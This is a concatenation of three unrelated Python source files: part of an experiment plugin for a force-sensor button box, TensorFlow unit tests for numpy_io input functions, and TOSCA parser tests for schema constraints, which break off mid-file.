if key[0] == u'q':
msg = "Experiment quitted by user!"
self.udp.send(rc.Command.QUIT)
print(msg)
self._exp.end()
exit()
canvas(self._exp).show()
self.clock.wait(300)
cnv = canvas(self._exp)
cnv.text("Connected")
cnv.show()
self.clock.wait(500)
self.udp.send(rc.Command.FILENAME.decode('utf-8', 'replace') + "{0}_{1}.csv".format(self.experiment_name,
self.subject_number))
rtn = self.udp.receive(5) # paused
if rtn is None:
msg = "Force server not responding"
cnv = canvas(self._exp)
cnv.text(msg)
cnv.show()
kbd.get_key()
self.udp.send(rc.Command.QUIT)
print(msg)
self._exp.end()
exit()
version = rc.get_data(rc.Command.GET_VERSION)
if version is None:
version = "" # FIXME Why is version somethimes None
cnv = canvas(self._exp)
cnv.text("Connected <br> Version " + version)
cnv.show()
self.clock.wait(1000)
return version
def force_button_box_prepare(self, n_sensors=1):
self.udp.clear_receive_buffer()
self.udp.send(rc.Command.SET_LEVEL_CHANGE_DETECTION)
if n_sensors>1:
self.udp.send(rc.Command.SET_LEVEL_CHANGE_DETECTION2)
def force_button_box_check(self):
"""
changes to level
"""
evt, level = rc.poll_multiple_events([rc.Command.CHANGED_LEVEL,
rc.Command.CHANGED_LEVEL2])
if evt is not None:
if evt == rc.Command.CHANGED_LEVEL:
sensor = 1
else:
sensor = 2
return (sensor, level)
return (None, None)
def force_button_box_wait(self, duration=None, minimum_level=-1):
"""
returns if one of two sensors changes its level
"""
self.clock.reset_stopwatch()
kbd = keyboard(self._exp)
last_key = None
rt = None
self.force_button_box_prepare()
while not (duration is not None and self.clock.stopwatch_time > duration):
sensor, level = self.force_button_box_check()
if sensor is not None:
if level >= minimum_level:
rt = self.clock.stopwatch_time
break
else:
self.force_button_box_prepare()
sensor = None
last_key, _ = kbd.get_key(timeout=0)
if last_key is not None:
break
return sensor, level, rt, last_key
def wait_no_button_pressed(self, feedback_stimulus_text=None, polling_intervall=500):
"""level detection needs to be switch on
display feedback_stimulus (optional) if one button pressed
"""
if rc.get_data(rc.Command.GET_THRESHOLD_LEVEL) > 0 or \
rc.get_data(rc.Command.GET_THRESHOLD_LEVEL) > 0:
if feedback_stimulus_text is not None:
cnv = canvas(self._exp)
cnv.text(feedback_stimulus_text)
cnv.show()
kbd = keyboard(self._exp)
while rc.get_data(rc.Command.GET_THRESHOLD_LEVEL) > 0 or \
rc.get_data(rc.Command.GET_THRESHOLD_LEVEL) > 0:
kbd.get_key(timeout=polling_intervall)
def set_thresholds(self, lower, upper):
rc.set_force_thresholds(lower=lower, upper=upper)
def hold_check(self, holding_time=3000,
left_pos=-200, right_pos=200, radius=50,
col_fine='gray',
col_too_low='green',
col_too_strong='red',
n_sensors=2):
kbd = keyboard(self._exp)
blank = canvas(self._exp)
blank.show()
self.udp.send("hold:test")
self.clock.reset_stopwatch()
prev_lv = None
while True:
self.udp.clear_receive_buffer()
lv = [rc.get_data(rc.Command.GET_THRESHOLD_LEVEL)]
if n_sensors>1:
lv.append(rc.get_data(rc.Command.GET_THRESHOLD_LEVEL2))
else:
lv.append(lv[0]) # just double, if one sensor
if prev_lv != lv:
# level has changes
self.clock.reset_stopwatch()
prev_lv = lv
cnv = canvas(self._exp)
for i, pos in enumerate([left_pos, right_pos]):
if lv[i] == WEAK:
cnv.circle(x=pos, y=0, r=radius, fill=True,
color=col_too_low)
elif lv[i] == STRONG:
cnv.circle(x=pos, y=0, r=radius, fill=True,
color=col_too_strong)
elif lv[i] == FINE:
cnv.circle(x=pos, y=0, r=radius, fill=True,
color=col_fine)
cnv.show()
key, _ = kbd.get_key(timeout=0)
if (lv == [FINE, FINE] and self.clock.stopwatch_time > holding_time) or\
(key is not None):
break
blank.show()
class ExpyClock():
"""Expyriment-like stopwatch based on Opensesame clock"""
def __init__(self, opensesame_clock):
self._clock = opensesame_clock
self.reset_stopwatch()
@property
def time(self):
return self._clock.time()
@property
def stopwatch_time(self):
return self._clock.time() - self._start
def reset_stopwatch(self):
self._start = self._clock.time()
def wait(self, waiting_time):
return self._clock.sleep(waiting_time)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for numpy_io."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.client import session as session_lib
from tensorflow.python.estimator.inputs import numpy_io
from tensorflow.python.feature_column import feature_column_lib as fc
from tensorflow.python.feature_column.feature_column import _LinearModel
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import monitored_session
from tensorflow.python.training import queue_runner_impl
class NumpyIoTest(test.TestCase):
def testNumpyInputFn(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = np.arange(-32, -28)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
session.run([features, target])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithVeryLargeBatchSizeAndMultipleEpochs(self):
a = np.arange(2) * 1.0
b = np.arange(32, 34)
x = {'a': a, 'b': b}
y = np.arange(-32, -30)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=128, shuffle=False, num_epochs=2)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1, 0, 1])
self.assertAllEqual(res[0]['b'], [32, 33, 32, 33])
self.assertAllEqual(res[1], [-32, -31, -32, -31])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithZeroEpochs(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = np.arange(-32, -28)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=0)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithBatchSizeNotDividedByDataSize(self):
batch_size = 2
a = np.arange(5) * 1.0
b = np.arange(32, 37)
x = {'a': a, 'b': b}
y = np.arange(-32, -27)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=batch_size, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [2, 3])
self.assertAllEqual(res[0]['b'], [34, 35])
self.assertAllEqual(res[1], [-30, -29])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [4])
self.assertAllEqual(res[0]['b'], [36])
self.assertAllEqual(res[1], [-28])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithBatchSizeNotDividedByDataSizeAndMultipleEpochs(self):
batch_size = 2
a = np.arange(3) * 1.0
b = np.arange(32, 35)
x = {'a': a, 'b': b}
y = np.arange(-32, -29)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=batch_size, shuffle=False, num_epochs=3)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [2, 0])
self.assertAllEqual(res[0]['b'], [34, 32])
self.assertAllEqual(res[1], [-30, -32])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [1, 2])
self.assertAllEqual(res[0]['b'], [33, 34])
self.assertAllEqual(res[1], [-31, -30])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1])
self.assertAllEqual(res[0]['b'], [32, 33])
self.assertAllEqual(res[1], [-32, -31])
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [2])
self.assertAllEqual(res[0]['b'], [34])
self.assertAllEqual(res[1], [-30])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithBatchSizeLargerThanDataSize(self):
batch_size = 10
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = np.arange(-32, -28)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=batch_size, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [0, 1, 2, 3])
self.assertAllEqual(res[0]['b'], [32, 33, 34, 35])
self.assertAllEqual(res[1], [-32, -31, -30, -29])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithDifferentDimensionsOfFeatures(self):
a = np.array([[1, 2], [3, 4]])
b = np.array([5, 6])
x = {'a': a, 'b': b}
y = np.arange(-32, -30)
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
res = session.run([features, target])
self.assertAllEqual(res[0]['a'], [[1, 2], [3, 4]])
self.assertAllEqual(res[0]['b'], [5, 6])
self.assertAllEqual(res[1], [-32, -31])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithXAsNonDict(self):
x = list(range(32, 36))
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(TypeError, 'x must be a dict or array'):
failing_input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
failing_input_fn()
def testNumpyInputFnWithXIsEmptyDict(self):
x = {}
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(ValueError, 'x cannot be an empty'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithXIsEmptyArray(self):
x = np.array([[], []])
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(ValueError, 'x cannot be an empty'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithYIsNone(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = None
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features_tensor = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
feature = session.run(features_tensor)
self.assertEqual(len(feature), 2)
self.assertAllEqual(feature['a'], [0, 1])
self.assertAllEqual(feature['b'], [32, 33])
session.run([features_tensor])
with self.assertRaises(errors.OutOfRangeError):
session.run([features_tensor])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithNonBoolShuffle(self):
x = np.arange(32, 36)
y = np.arange(4)
with self.test_session():
with self.assertRaisesRegexp(ValueError,
'shuffle must be provided and explicitly '
'set as boolean'):
# Default shuffle is None.
numpy_io.numpy_input_fn(x, y)
def testNumpyInputFnWithTargetKeyAlreadyInX(self):
array = np.arange(32, 36)
x = {'__target_key__': array}
y = np.arange(4)
with self.test_session():
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
input_fn()
self.assertAllEqual(x['__target_key__'], array)
# The input x should not be mutated.
self.assertItemsEqual(x.keys(), ['__target_key__'])
def testNumpyInputFnWithMismatchLengthOfInputs(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
x_mismatch_length = {'a': np.arange(1), 'b': b}
y_longer_length = np.arange(10)
with self.test_session():
with self.assertRaisesRegexp(
ValueError, 'Length of tensors in x and y is mismatched.'):
failing_input_fn = numpy_io.numpy_input_fn(
x, y_longer_length, batch_size=2, shuffle=False, num_epochs=1)
failing_input_fn()
with self.assertRaisesRegexp(
ValueError, 'Length of tensors in x and y is mismatched.'):
failing_input_fn = numpy_io.numpy_input_fn(
x=x_mismatch_length,
y=None,
batch_size=2,
shuffle=False,
num_epochs=1)
failing_input_fn()
def testNumpyInputFnWithYAsDict(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = {'y1': np.arange(-32, -28), 'y2': np.arange(32, 28, -1)}
with self.test_session() as session:
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features_tensor, targets_tensor = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
features, targets = session.run([features_tensor, targets_tensor])
self.assertEqual(len(features), 2)
self.assertAllEqual(features['a'], [0, 1])
self.assertAllEqual(features['b'], [32, 33])
self.assertEqual(len(targets), 2)
self.assertAllEqual(targets['y1'], [-32, -31])
self.assertAllEqual(targets['y2'], [32, 31])
session.run([features_tensor, targets_tensor])
with self.assertRaises(errors.OutOfRangeError):
session.run([features_tensor, targets_tensor])
coord.request_stop()
coord.join(threads)
def testNumpyInputFnWithYIsEmptyDict(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = {}
with self.test_session():
with self.assertRaisesRegexp(ValueError, 'y cannot be empty'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithDuplicateKeysInXAndY(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x = {'a': a, 'b': b}
y = {'y1': np.arange(-32, -28), 'a': a, 'y2': np.arange(32, 28, -1), 'b': b}
with self.test_session():
with self.assertRaisesRegexp(
ValueError, '2 duplicate keys are found in both x and y'):
failing_input_fn = numpy_io.numpy_input_fn(x, y, shuffle=False)
failing_input_fn()
def testNumpyInputFnWithXIsArray(self):
x = np.arange(4) * 1.0
y = np.arange(-32, -28)
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
with monitored_session.MonitoredSession() as session:
res = session.run([features, target])
self.assertAllEqual(res[0], [0, 1])
self.assertAllEqual(res[1], [-32, -31])
session.run([features, target])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
def testNumpyInputFnWithXIsNDArray(self):
x = np.arange(16).reshape(4, 2, 2) * 1.0
y = np.arange(-48, -32).reshape(4, 2, 2)
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = input_fn()
with monitored_session.MonitoredSession() as session:
res = session.run([features, target])
self.assertAllEqual(res[0], [[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
self.assertAllEqual(
res[1], [[[-48, -47], [-46, -45]], [[-44, -43], [-42, -41]]])
session.run([features, target])
with self.assertRaises(errors.OutOfRangeError):
session.run([features, target])
def testNumpyInputFnWithXIsArrayYIsDict(self):
x = np.arange(4) * 1.0
y = {'y1': np.arange(-32, -28)}
input_fn = numpy_io.numpy_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features_tensor, targets_tensor = input_fn()
with monitored_session.MonitoredSession() as session:
features, targets = session.run([features_tensor, targets_tensor])
self.assertEqual(len(features), 2)
self.assertAllEqual(features, [0, 1])
self.assertEqual(len(targets), 1)
self.assertAllEqual(targets['y1'], [-32, -31])
session.run([features_tensor, targets_tensor])
with self.assertRaises(errors.OutOfRangeError):
session.run([features_tensor, targets_tensor])
def testArrayAndDictGiveSameOutput(self):
a = np.arange(4) * 1.0
b = np.arange(32, 36)
x_arr = np.vstack((a, b))
x_dict = {'feature1': x_arr}
y = np.arange(-48, -40).reshape(2, 4)
input_fn_arr = numpy_io.numpy_input_fn(
x_arr, y, batch_size=2, shuffle=False, num_epochs=1)
features_arr, targets_arr = input_fn_arr()
input_fn_dict = numpy_io.numpy_input_fn(
x_dict, y, batch_size=2, shuffle=False, num_epochs=1)
features_dict, targets_dict = input_fn_dict()
with monitored_session.MonitoredSession() as session:
res_arr, res_dict = session.run([
(features_arr, targets_arr), (features_dict, targets_dict)])
self.assertAllEqual(res_arr[0], res_dict[0]['feature1'])
self.assertAllEqual(res_arr[1], res_dict[1])
class FeatureColumnIntegrationTest(test.TestCase):
def _initialized_session(self, config=None):
sess = session_lib.Session(config=config)
sess.run(variables_lib.global_variables_initializer())
sess.run(lookup_ops.tables_initializer())
return sess
def _get_linear_model_bias(self, name='linear_model'):
with variable_scope.variable_scope(name, reuse=True):
return variable_scope.get_variable('bias_weights')
def _get_linear_model_column_var(self, column, name='linear_model'):
return ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES,
name + '/' + column.name)[0]
def _get_keras_linear_model_predictions(
self,
features,
feature_columns,
units=1,
sparse_combiner='sum',
weight_collections=None,
trainable=True,
cols_to_vars=None):
keras_linear_model = _LinearModel(
feature_columns,
units,
sparse_combiner,
weight_collections,
trainable,
name='linear_model')
retval = keras_linear_model(features) # pylint: disable=not-callable
if cols_to_vars is not None:
cols_to_vars.update(keras_linear_model.cols_to_vars())
return retval
def test_linear_model_numpy_input_fn(self):
price = fc.numeric_column('price')
price_buckets = fc.bucketized_column(price, boundaries=[0., 10., 100.,])
body_style = fc.categorical_column_with_vocabulary_list(
'body-style', vocabulary_list=['hardtop', 'wagon', 'sedan'])
input_fn = numpy_io.numpy_input_fn(
x={
'price': np.array([-1., 2., 13., 104.]),
'body-style': np.array(['sedan', 'hardtop', 'wagon', 'sedan']),
},
batch_size=2,
shuffle=False)
features = input_fn()
net = fc.linear_model(features, [price_buckets, body_style])
# self.assertEqual(1 + 3 + 5, net.shape[1])
with self._initialized_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess, coord=coord)
bias = self._get_linear_model_bias()
price_buckets_var = self._get_linear_model_column_var(price_buckets)
body_style_var = self._get_linear_model_column_var(body_style)
sess.run(price_buckets_var.assign([[10.], [100.], [1000.], [10000.]]))
sess.run(body_style_var.assign([[-10.], [-100.], [-1000.]]))
sess.run(bias.assign([5.]))
self.assertAllClose([[10 - 1000 + 5.], [100 - 10 + 5.]], sess.run(net))
coord.request_stop()
coord.join(threads)
def test_linear_model_impl_numpy_input_fn(self):
price = fc.numeric_column('price')
price_buckets = fc.bucketized_column(
price, boundaries=[
0.,
10.,
100.,
])
body_style = fc.categorical_column_with_vocabulary_list(
'body-style', vocabulary_list=['hardtop', 'wagon', 'sedan'])
input_fn = numpy_io.numpy_input_fn(
x={
'price': np.array([-1., 2., 13., 104.]),
'body-style': np.array(['sedan', 'hardtop', 'wagon', 'sedan']),
},
batch_size=2,
shuffle=False)
features = input_fn()
net = self._get_keras_linear_model_predictions(
features, [price_buckets, body_style])
# self.assertEqual(1 + 3 + 5, net.shape[1])
with self._initialized_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess, coord=coord)
bias = self._get_linear_model_bias()
price_buckets_var = self._get_linear_model_column_var(price_buckets)
body_style_var = self._get_linear_model_column_var(body_style)
sess.run(price_buckets_var.assign([[10.], [100.], [1000.], [10000.]]))
sess.run(body_style_var.assign([[-10.], [-100.], [-1000.]]))
sess.run(bias.assign([5.]))
self.assertAllClose([[10 - 1000 + 5.], [100 - 10 + 5.]], sess.run(net))
coord.request_stop()
coord.join(threads)
def test_functional_input_layer_with_numpy_input_fn(self):
embedding_values = (
(1., 2., 3., 4., 5.), # id 0
(6., 7., 8., 9., 10.), # id 1
(11., 12., 13., 14., 15.) # id 2
)
def _initializer(shape, dtype, partition_info):
del shape, dtype, partition_info
return embedding_values
# price has 1 dimension in input_layer
price = fc.numeric_column('price')
body_style = fc.categorical_column_with_vocabulary_list(
'body-style', vocabulary_list=['hardtop', 'wagon', 'sedan'])
# one_hot_body_style has 3 dims in input_layer.
one_hot_body_style = fc.indicator_column(body_style)
# embedded_body_style has 5 dims in input_layer.
embedded_body_style = fc.embedding_column(body_style, dimension=5,
initializer=_initializer)
input_fn = numpy_io.numpy_input_fn(
x={
'price': np.array([11., 12., 13., 14.]),
'body-style': np.array(['sedan', 'hardtop', 'wagon', 'sedan']),
},
batch_size=2,
shuffle=False)
features = input_fn()
net = fc.input_layer(features,
[price, one_hot_body_style, embedded_body_style])
self.assertEqual(1 + 3 + 5, net.shape[1])
with self._initialized_session() as sess:
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess, coord=coord)
# Each row is formed by concatenating `embedded_body_style`,
# `one_hot_body_style`, and `price` in order.
self.assertAllEqual(
[[11., 12., 13., 14., 15., 0., 0., 1., 11.],
[1., 2., 3., 4., 5., 1., 0., 0., 12]],
sess.run(net))
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
test.main()
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import yaml
from parser.common import exception
from parser.elements.types.constraints import Constraint
from parser.elements.types.constraints import Schema
from parser.tests.base import TestCase
from parser.utils import yamlparser
class ConstraintTest(TestCase):
def test_schema_dict(self):
tpl_snippet = '''
cpus:
type: integer
description: Number of CPUs for the server.
'''
schema = yamlparser.simple_parse(tpl_snippet)
cpus_schema = Schema('cpus', schema['cpus'])
self.assertEqual(len(cpus_schema), 2)
self.assertEqual('integer', cpus_schema.type)
self.assertEqual('Number of CPUs for the server.',
cpus_schema.description)
self.assertEqual(True, cpus_schema.required)
self.assertIsNone(cpus_schema.default)
def test_schema_not_dict(self):
tpl_snippet = '''
cpus:
- type: integer
- description: Number of CPUs for the server.
'''
schema = yamlparser.simple_parse(tpl_snippet)
error = self.assertRaises(exception.InvalidSchemaError, Schema,
'cpus', schema['cpus'])
self.assertEqual('Schema cpus must be a dict.', str(error))
def test_schema_miss_type(self):
tpl_snippet = '''
cpus:
description: Number of CPUs for the server.
'''
schema = yamlparser.simple_parse(tpl_snippet)
error = self.assertRaises(exception.InvalidSchemaError, Schema,
'cpus', schema['cpus'])
self.assertEqual('Schema cpus must have type.', str(error))
def test_schema_none_description(self):
tpl_snippet = '''
cpus:
type: integer
'''
schema = yamlparser.simple_parse(tpl_snippet)
cpus_schema = Schema('cpus', schema['cpus'])
self.assertEqual('', cpus_schema.description)
def test_invalid_constraint_type(self):
schema = {'invalid_type': 2}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('Invalid constraint type "invalid_type".',
str(error))
def test_invalid_prop_type(self):
schema = {'length': 5}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('Constraint type "length" is not valid for '
'data type "integer".', str(error))
def test_invalid_validvalues(self):
schema = {'valid_values': 2}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('valid_values must be a list.', str(error))
def test_validvalues_validate(self):
schema = {'valid_values': [2, 4, 6, 8]}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(4))
def test_validvalues_validate_fail(self):
schema = {'valid_values': [2, 4, 6, 8]}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 5)
self.assertEqual('prop: 5 is not an valid value "[2, 4, 6, 8]".',
str(error))
def test_invalid_in_range(self):
snippet = 'in_range: {2, 6}'
schema = yaml.load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('in_range must be a list.', str(error))
def test_in_range_min_max(self):
schema = {'in_range': [2, 6]}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertEqual(2, constraint.min)
self.assertEqual(6, constraint.max)
def test_in_range_validate(self):
schema = {'in_range': [2, 6]}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(2))
self.assertIsNone(constraint.validate(4))
self.assertIsNone(constraint.validate(6))
def test_in_range_validate_fail(self):
schema = {'in_range': [2, 6]}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 8)
self.assertEqual('prop: 8 is out of range (min:2, max:6).',
str(error))
def test_equal_validate(self):
schema = {'equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(4))
def test_equal_validate_fail(self):
schema = {'equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 8)
self.assertEqual('prop: 8 is not equal to "4".', str(error))
def test_greater_than_validate(self):
schema = {'greater_than': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(6))
def test_greater_than_validate_fail(self):
schema = {'greater_than': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 3)
self.assertEqual('prop: 3 must be greater than "4".', str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate, 4)
self.assertEqual('prop: 4 must be greater than "4".', str(error))
def test_greater_than_invalid(self):
snippet = 'greater_than: {4}'
schema = yaml.load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('greater_than must be comparable.', str(error))
def test_greater_or_equal_validate(self):
schema = {'greater_or_equal': 3.9}
constraint = Constraint('prop', Schema.FLOAT, schema)
self.assertIsNone(constraint.validate(3.9))
self.assertIsNone(constraint.validate(4.0))
def test_greater_or_equal_validate_fail(self):
schema = {'greater_or_equal': 3.9}
constraint = Constraint('prop', Schema.FLOAT, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 3.0)
self.assertEqual('prop: 3.0 must be greater or equal to "3.9".',
str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate, 3.8)
self.assertEqual('prop: 3.8 must be greater or equal to "3.9".',
str(error))
def test_greater_or_equal_invalid(self):
snippet = 'greater_or_equal: {3.9}'
schema = yaml.load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('greater_or_equal must be comparable.', str(error))
def test_less_than_validate(self):
schema = {'less_than': datetime.date(2014, 0o7, 25)}
constraint = Constraint('prop', Schema.TIMESTAMP, schema)
self.assertIsNone(constraint.validate(datetime.date(2014, 0o7, 20)))
self.assertIsNone(constraint.validate(datetime.date(2014, 0o7, 24)))
def test_less_than_validate_fail(self):
schema = {'less_than': datetime.date(2014, 0o7, 25)}
constraint = Constraint('prop', Schema.TIMESTAMP, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate,
datetime.date(2014, 0o7, 25))
self.assertEqual('prop: 2014-07-25 must be '
'less than "2014-07-25".',
str(error))
error = self.assertRaises(exception.ValidationError,
constraint.validate,
datetime.date(2014, 0o7, 27))
self.assertEqual('prop: 2014-07-27 must be '
'less than "2014-07-25".',
str(error))
def test_less_than_invalid(self):
snippet = 'less_than: {3.9}'
schema = yaml.load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('less_than must be comparable.', str(error))
def test_less_or_equal_validate(self):
schema = {'less_or_equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
self.assertIsNone(constraint.validate(4))
self.assertIsNone(constraint.validate(3))
def test_less_or_equal_validate_fail(self):
schema = {'less_or_equal': 4}
constraint = Constraint('prop', Schema.INTEGER, schema)
error = self.assertRaises(exception.ValidationError,
constraint.validate, 5)
self.assertEqual('prop: 5 must be less or equal to "4".', str(error))
def test_less_or_equal_invalid(self):
snippet = 'less_or_equal: {3.9}'
schema = yaml.load(snippet)
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.INTEGER,
schema)
self.assertEqual('less_or_equal must be comparable.', str(error))
def test_invalid_length(self):
schema = {'length': 'four'}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('length must be integer.', str(error))
schema = {'length': 4.5}
error = self.assertRaises(exception.InvalidSchemaError, Constraint,
'prop', Schema.STRING,
schema)
self.assertEqual('length must be integer.', str(error))
def test_length_validate(self):
schema = {'length': 4}
constraint = Constraint('prop', Schema.STRING, schema)
self.assertIsNone(constraint.validate('abcd'))
def test_length_validate_fail(self):
